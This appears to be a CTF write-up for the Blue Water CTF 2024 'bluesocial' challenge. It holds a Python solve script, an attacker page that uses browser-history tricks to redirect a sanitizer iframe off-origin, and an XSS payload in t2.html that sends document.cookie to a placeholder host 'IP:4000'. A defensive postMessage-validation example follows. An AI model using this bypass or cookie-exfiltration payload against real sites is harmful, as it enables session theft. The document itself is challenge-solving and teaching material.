@parrot409
Created October 14, 2024 13:23
Blue Water CTF 2024 - bluesocial
```python
#!/usr/bin/env python3
import requests
target = 'http://bluesocial.chal.perfect.blue:25005'
s = requests.session()
# log in as "home" (this is the writeup's "create user home" step)
s.post(f'{target}/login',data={'username':'home'})
# bio for "home": a copy of the app's own home page markup, so that /user/home carries an
# iframe with the real sanitizer frame's id, pointing at user p13371 (same origin, so allowed by the CSP)
s.post(f'{target}/user/update',data={'bio':"""
<!DOCTYPE html>
<html lang='en'>
<head>
<meta charset='UTF-8'>
<meta name='viewport' content='width=device-width, initial-scale=1.0'>
<title>Transient Social App</title>
</head>
<body style='font-family: Arial, sans-serif; margin: 0; padding: 20px;'>
<nav style='background-color: #f2f2f2; padding: 10px; margin-bottom: 20px;'>
<h1 style='margin: 0;'><a href='/' style='text-decoration: none; color: black;'>Transient Social App</a></h1>
<div>
<a href='/user/home'>Home</a> |
<a href='/logout'>Logout</a>
</div>
</nav>
<h2>Welcome to Transient Social App, p13372!</h2>
<p><strong>Your bio:</strong> <span id='userBio'>Loading...</span></p>
<h3>Update Your Bio</h3>
<form id='updateBioForm'>
<textarea id='bioInput' name='bio' placeholder='Enter your bio'></textarea><br>
<button type='submit'>Update Bio</button>
</form>
<iframe id='dompurifyFrame' src='/user/p13371' style='display: none;'></iframe>
<script src='/static/home.js'></script>
</body>
</html>
""".replace('\n','')})
# bio for p13371: a meta refresh that sends the iframe to the attacker-hosted page (IP is a placeholder)
s.post(f'{target}/login',data={'username':'p13371'})
s.post(f'{target}/user/update',data={'bio':"""
<meta http-equiv='refresh' content='0; url=http://IP:4000/t2.html'>
""".strip()})
s.post(f'{target}/login',data={'username':'home'})
# wait until the victim's window has reached the right state, then log out,
# which is the writeup's "delete user home" step
input('good: ')
s.get(f'{target}/logout')
```
It was a very fun challenge.
The trick:
- create user "home"
- `x = window.open(perfect.blue/user/home)` on attacker.com
- perfect.blue/user/home has an iframe that, because of the CSP, can only point at perfect.blue
- that iframe redirects (with a meta refresh tag) to attacker.com/bypass-purify
- navigate the window away with `x.location = attacker.com/doesnt-matter`
- delete user home
- call `x.history.back()`
- now, magically, the `dompurifyFrame` iframe points to attacker.com/bypass-purify, so the attacker page answers the sanitization request and sanitization is bypassed
```html
<!-- page the victim opens on the attacker's host -->
<form id=wow action="http://bluesocial.chal.perfect.blue:25005/login" method=POST >
<input name=username value=smh >
</form>
<script>
// a second, named window ('d') submits the login form; the original window carries on
if(window.name){
wow.submit()
throw "A"
} else {
window.open("?",'d')
}
let target = 'http://bluesocial.chal.perfect.blue:25005'
let x = window.open(`${target}/user/home`)   // open /user/home (the "home" user's page)
setTimeout(_=>{
x.location = '/xx'                            // navigate x to attacker.com/doesnt-matter
},2000)
setTimeout(_=>fetch('?gogo'),3000)           // beacon to the attacker's server; the solve script is waiting at input() to log out "home"
function df(){
window.open(`${target}/user/home`)
setTimeout(_=>x.history.back(),1000)         // go back: the restored iframe now sits at attacker.com/bypass-purify
}
setTimeout(df,6000)
</script>
```
```html
<!-- t2.html: the page the iframe is redirected to; it answers the sanitizer's postMessage over the supplied port -->
<script>
window.addEventListener('message', function(event) {
event.ports[0].postMessage(`<img src=1 onerror='fetch("http://IP:4000/?a="+document.cookie)' >`);
});
</script>
```
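The last file above shows why the trick works: the home page hands its sanitizer frame a MessagePort and inserts whatever string comes back on it, so once the frame has been navigated off-origin, anything can come back. The following is an added, defender-side example, not the challenge's `home.js` (which the gist does not reproduce); the function names, the `requestId`-tagged message format and the `https://app.example` origin are assumptions. It shows the three controls that close this class of bug: deliver the request with a strict `targetOrigin` rather than `'*'` (the browser then drops both the message and the transferred port if the frame is elsewhere), bind each reply to its own outstanding request with a deadline, and fail closed when validation fails.

```javascript
// Added example (not the challenge's own code). Assumed design under attack: the parent
// posts the raw bio to an iframe, transfers one end of a MessageChannel, and inserts
// whatever string returns on the other end. Names and message shape are this example's own.

const DEFAULT_TIMEOUT_MS = 2000;

// Send one sanitization request. `frameWindow` is the iframe's contentWindow and
// `expectedOrigin` is the origin the sanitizer must live on (in a browser: location.origin).
// Returns the record the reply will be validated against.
function sendSanitizeRequest(frameWindow, html, expectedOrigin, channel) {
  const requestId = Math.random().toString(36).slice(2);
  const pending = { requestId, issuedAt: Date.now(), timeoutMs: DEFAULT_TIMEOUT_MS };
  // Strict targetOrigin: if the frame has been navigated to another origin, the browser
  // discards the message together with the transferred port, so nobody else ever holds it.
  frameWindow.postMessage({ type: 'sanitize', requestId, html }, expectedOrigin, [channel.port2]);
  return pending;
}

// Decide whether a reply received on port1 may be inserted into the document.
// Messages on a MessagePort carry an empty event.origin, so origin cannot be checked
// here; instead the reply must match the outstanding request, arrive before its
// deadline, and carry a string payload. `now` is injectable for testing.
function validateReply(reply, pending, now = Date.now()) {
  if (!pending) return { ok: false, reason: 'no outstanding request' };
  if (now - pending.issuedAt > pending.timeoutMs) return { ok: false, reason: 'timed out' };
  if (!reply || typeof reply !== 'object') return { ok: false, reason: 'malformed reply' };
  if (reply.requestId !== pending.requestId) return { ok: false, reason: 'request id mismatch' };
  if (typeof reply.sanitized !== 'string') return { ok: false, reason: 'payload is not a string' };
  return { ok: true, sanitized: reply.sanitized };
}

// Fail closed: a reply that does not validate renders as empty text, never as HTML.
function renderBio(bioElement, verdict) {
  if (verdict.ok) {
    bioElement.innerHTML = verdict.sanitized;
  } else {
    bioElement.textContent = '';
  }
  return verdict.ok;
}

// Stand-alone demo with a constructed stand-in for the iframe window (no DOM needed):
// a frame that never answers leads to a timed-out verdict, and nothing gets rendered.
function demo() {
  const silentFrame = { postMessage: () => {} };
  const pending = sendSanitizeRequest(silentFrame, '<b>bio</b>', 'https://app.example', { port2: {} });
  return validateReply(undefined, pending, pending.issuedAt + DEFAULT_TIMEOUT_MS + 1);
}
console.log(demo());
```

In the browser the parent would wire `channel.port1.onmessage = e => renderBio(el, validateReply(e.data, pending))` and clear `pending` once a verdict is rendered; the strict `targetOrigin` is the control that defeats the history-restoration trick above, and the request binding and timeout keep a late or stray reply from ever reaching `innerHTML`.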